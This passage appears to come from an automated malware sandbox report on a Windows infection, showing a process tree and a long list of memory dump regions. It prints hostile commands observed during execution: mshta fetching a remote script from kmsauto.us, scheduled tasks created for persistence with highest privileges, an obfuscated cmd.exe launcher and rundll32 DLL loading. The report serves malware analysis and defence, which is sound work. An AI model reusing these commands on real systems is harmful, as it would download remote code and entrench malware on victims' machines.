                                                                                                                                                                                                            • C:\Windows\System32\mshta.exe
                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" https://kmsauto.us/Encoding.txt
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:6708
                                                                                                                                                                                                          • C:\Users\Admin\Documents\xUAWVbgheQaQZPHzEhPxOLmQ.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\xUAWVbgheQaQZPHzEhPxOLmQ.exe"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:3236
                                                                                                                                                                                                            • C:\Users\Admin\Documents\eijeTGN1d4o_F3BMLHZPuxB_.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\eijeTGN1d4o_F3BMLHZPuxB_.exe"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:776
                                                                                                                                                                                                              • C:\Users\Admin\Documents\M3qGifafPi2zaNtGH1z0TTij.exe
                                                                                                                                                                                                                "C:\Users\Admin\Documents\M3qGifafPi2zaNtGH1z0TTij.exe"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:688
                                                                                                                                                                                                                • C:\Users\Admin\Documents\T719vnIUkaB8BReRjVe5c8tl.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Documents\T719vnIUkaB8BReRjVe5c8tl.exe"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:3952
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 480
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:3264
                                                                                                                                                                                                                  • C:\Users\Admin\Documents\78lBwuodXHy6XUQrNjYlBKKr.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Documents\78lBwuodXHy6XUQrNjYlBKKr.exe"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:3972
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 676
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:5024
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 680
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:5784
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 704
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:4964
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 732
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:5564
                                                                                                                                                                                                                    • C:\Users\Admin\Documents\RnZ_X9CKDccv2NRzWpbbCF2R.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Documents\RnZ_X9CKDccv2NRzWpbbCF2R.exe"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:3964
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                          PID:764
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                          PID:504
                                                                                                                                                                                                                      • C:\Users\Admin\Documents\uPTd21XaOgJg2JoYoTzn7XgT.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Documents\uPTd21XaOgJg2JoYoTzn7XgT.exe"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:4012
                                                                                                                                                                                                                        • C:\Users\Admin\Documents\LAqVhLBAiS6p6smCJJK0gDj3.exe
                                                                                                                                                                                                                          "C:\Users\Admin\Documents\LAqVhLBAiS6p6smCJJK0gDj3.exe"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:1452
                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:4632
                                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\inst1.exe
                                                                                                                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\inst1.exe"
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:4712
                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:4656
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\hJWoYz5JAYPS1cRdut4t6eDM.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\hJWoYz5JAYPS1cRdut4t6eDM.exe"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:2820
                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\FudZMjy3yMTpaBpf5_BHe8XX.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\FudZMjy3yMTpaBpf5_BHe8XX.exe"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:1868
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\FUDZMJ~1.DLL,s C:\Users\Admin\DOCUME~1\FUDZMJ~1.EXE
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:6756
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "-PyTJSIPDC12bsxp0f1 " == "" for %Q in ( "C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" ) do taskkill -F -im "%~NxQ"
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:5576
                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                        PID:5824
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:4220
                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:6624

                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                          • memory/508-255-0x0000000077D80000-0x0000000077F0E000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                          • memory/508-286-0x0000000005DA0000-0x0000000005DA1000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/508-269-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/688-407-0x0000000003000000-0x0000000003926000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            9.1MB

                                                                                                                                                                                                                                          • memory/688-463-0x0000000000400000-0x00000000027D8000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            35.8MB

                                                                                                                                                                                                                                          • memory/740-114-0x0000000004240000-0x000000000437F000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            1.2MB

                                                                                                                                                                                                                                          • memory/776-290-0x0000000005DA0000-0x0000000005DA1000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/776-246-0x0000000077D80000-0x0000000077F0E000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                          • memory/776-281-0x0000000005D10000-0x0000000005D11000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/776-283-0x0000000005D60000-0x0000000005D61000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/776-273-0x0000000006330000-0x0000000006331000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/776-277-0x0000000005E30000-0x0000000005E31000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/776-263-0x0000000000A20000-0x0000000000A21000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/776-276-0x0000000005CF0000-0x0000000005CF1000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/1012-549-0x0000000004C90000-0x0000000005296000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                          • memory/1032-272-0x0000000077D80000-0x0000000077F0E000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                          • memory/1032-344-0x00000000052C0000-0x00000000052C1000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/1032-297-0x00000000000C0000-0x00000000000C1000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/1104-299-0x0000000002400000-0x000000000254A000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            1.3MB

                                                                                                                                                                                                                                          • memory/1104-351-0x0000000000400000-0x0000000002400000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            32.0MB

                                                                                                                                                                                                                                          • memory/1620-262-0x0000000004F50000-0x0000000004F51000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/1620-223-0x0000000000550000-0x0000000000551000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/1772-230-0x0000000004F50000-0x0000000004FE2000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            584KB

                                                                                                                                                                                                                                          • memory/1772-201-0x00000000006A0000-0x00000000006A1000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/2060-288-0x000001330C130000-0x000001330C291000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            1.4MB

                                                                                                                                                                                                                                          • memory/2060-284-0x000001330BEE0000-0x000001330BFC4000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            912KB

                                                                                                                                                                                                                                          • memory/2396-211-0x0000000005D60000-0x0000000005D61000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/2396-191-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/2396-236-0x0000000005860000-0x0000000005D5E000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            5.0MB

                                                                                                                                                                                                                                          • memory/2396-220-0x0000000005910000-0x0000000005911000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/2396-232-0x00000000058F0000-0x00000000058F1000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/2528-210-0x0000000000D00000-0x0000000000D01000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/2528-243-0x0000000005520000-0x0000000005521000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/2528-229-0x0000000005560000-0x0000000005561000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/2528-260-0x00000000054E0000-0x0000000005556000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            472KB

                                                                                                                                                                                                                                          • memory/2536-357-0x0000000000890000-0x00000000008A6000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            88KB

                                                                                                                                                                                                                                          • memory/2820-193-0x0000000000B00000-0x0000000000C4A000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            1.3MB

                                                                                                                                                                                                                                          • memory/2820-190-0x0000000000B00000-0x0000000000C4A000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            1.3MB

                                                                                                                                                                                                                                          • memory/2836-386-0x0000000004FA0000-0x000000000549E000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            5.0MB

                                                                                                                                                                                                                                          • memory/3124-200-0x0000000000AB0000-0x0000000000AB1000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/3124-274-0x0000000008A60000-0x0000000008A76000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            88KB

                                                                                                                                                                                                                                          • memory/3124-233-0x00000000055D0000-0x0000000005ACE000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            5.0MB

                                                                                                                                                                                                                                          • memory/3160-536-0x00000000056E0000-0x0000000005CE6000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                          • memory/3236-501-0x0000000000400000-0x0000000002CD0000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            40.8MB

                                                                                                                                                                                                                                          • memory/3236-514-0x0000000004A20000-0x0000000004A21000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/3236-545-0x0000000004A23000-0x0000000004A24000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/3236-541-0x0000000004A22000-0x0000000004A23000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/3236-439-0x0000000002F10000-0x0000000002F3F000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            188KB

                                                                                                                                                                                                                                          • memory/3300-265-0x00000000050C0000-0x00000000050C1000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/3300-214-0x00000000006A0000-0x00000000006A1000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/3876-336-0x0000000000400000-0x0000000002400000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            32.0MB

                                                                                                                                                                                                                                          • memory/3876-303-0x0000000002690000-0x000000000272D000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            628KB

                                                                                                                                                                                                                                          • memory/3952-331-0x0000000000400000-0x00000000023AC000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            31.7MB

                                                                                                                                                                                                                                          • memory/3952-289-0x0000000000030000-0x0000000000039000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            36KB

                                                                                                                                                                                                                                          • memory/3960-306-0x0000000000030000-0x000000000003A000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            40KB

                                                                                                                                                                                                                                          • memory/3972-340-0x0000000000400000-0x00000000023B8000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            31.7MB

                                                                                                                                                                                                                                          • memory/3972-293-0x00000000001C0000-0x00000000001EF000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            188KB

                                                                                                                                                                                                                                          • memory/3984-252-0x0000000005590000-0x0000000005A8E000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            5.0MB

                                                                                                                                                                                                                                          • memory/3984-204-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/3984-225-0x0000000005590000-0x0000000005591000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/3984-256-0x0000000005730000-0x00000000057A2000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                          • memory/4012-189-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/4012-228-0x0000000001000000-0x0000000001019000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                          • memory/4012-226-0x000000001B750000-0x000000001B752000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                          • memory/4028-584-0x0000000005180000-0x0000000005786000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                          • memory/4444-348-0x0000000005630000-0x0000000005C36000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                          • memory/4456-355-0x0000000004E40000-0x000000000533E000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            5.0MB

                                                                                                                                                                                                                                          • memory/4536-294-0x0000000000420000-0x0000000000440000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            128KB

                                                                                                                                                                                                                                          • memory/4536-375-0x00000000047D0000-0x0000000004DD6000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                          • memory/4572-292-0x0000000000400000-0x0000000000409000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            36KB

                                                                                                                                                                                                                                          • memory/4632-374-0x000002312F9E0000-0x000002312FB41000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            1.4MB

                                                                                                                                                                                                                                          • memory/4656-267-0x0000000000030000-0x0000000000033000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            12KB

                                                                                                                                                                                                                                          • memory/4712-268-0x0000000000C50000-0x0000000000C62000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            72KB

                                                                                                                                                                                                                                          • memory/4712-258-0x00000000007E0000-0x00000000007F0000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            64KB

                                                                                                                                                                                                                                          • memory/4912-365-0x0000000005710000-0x0000000005D16000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                          • memory/5116-291-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            128KB

                                                                                                                                                                                                                                          • memory/5116-362-0x00000000051D0000-0x00000000057D6000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                          • memory/5168-588-0x0000000004DA0000-0x00000000053A6000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                          • memory/5252-526-0x0000000005120000-0x0000000005726000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                          • memory/5340-423-0x0000000005120000-0x0000000005726000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                          • memory/5360-428-0x0000000005120000-0x000000000561E000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            5.0MB

                                                                                                                                                                                                                                          • memory/5424-433-0x0000000004C90000-0x0000000005296000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                          • memory/5620-457-0x0000000004FC0000-0x00000000055C6000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                          • memory/5684-468-0x0000000005510000-0x0000000005A0E000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            5.0MB

                                                                                                                                                                                                                                          • memory/5704-579-0x0000000004EB0000-0x00000000053AE000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            5.0MB

                                                                                                                                                                                                                                          • memory/5776-473-0x0000000005490000-0x0000000005A96000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                          • memory/5940-491-0x00000000058C0000-0x0000000005EC6000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                          • memory/5992-531-0x00000000051A0000-0x000000000569E000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            5.0MB

                                                                                                                                                                                                                                          • memory/6000-497-0x0000000004860000-0x0000000004861000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/6000-506-0x0000000004862000-0x0000000004863000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/6088-510-0x00000000070A0000-0x00000000070A1000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                          • memory/6088-520-0x00000000070A2000-0x00000000070A3000-memory.dmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4KB